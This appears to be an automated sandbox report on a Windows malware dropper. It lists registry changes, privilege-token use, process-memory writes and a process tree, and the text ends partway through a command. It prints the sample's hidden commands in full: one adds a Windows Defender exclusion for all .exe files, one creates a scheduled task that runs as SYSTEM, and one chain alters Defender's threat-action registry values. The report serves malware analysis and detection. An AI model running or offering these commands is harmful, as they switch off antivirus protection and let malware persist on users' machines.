Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{0bf74aa2-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3644 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe
PID 3644 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe
PID 3644 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe
PID 3160 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3160 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3160 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1088 wrote to memory of 4060 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1088 wrote to memory of 4060 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1088 wrote to memory of 4060 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4060 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4060 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4060 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 2628 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 5036 wrote to memory of 2628 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 5036 wrote to memory of 2628 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3160 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3160 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3160 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1204 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1204 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1204 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1396 wrote to memory of 4872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1396 wrote to memory of 4872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1396 wrote to memory of 4872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4872 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4872 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4872 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1048 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1048 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1048 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 2492 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 2492 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 2492 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4668 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe

"C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe

.\Install.exe /AdidysikD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe\" Oz /qmsite_idPOM 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe Oz /qmsite_idPOM 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD 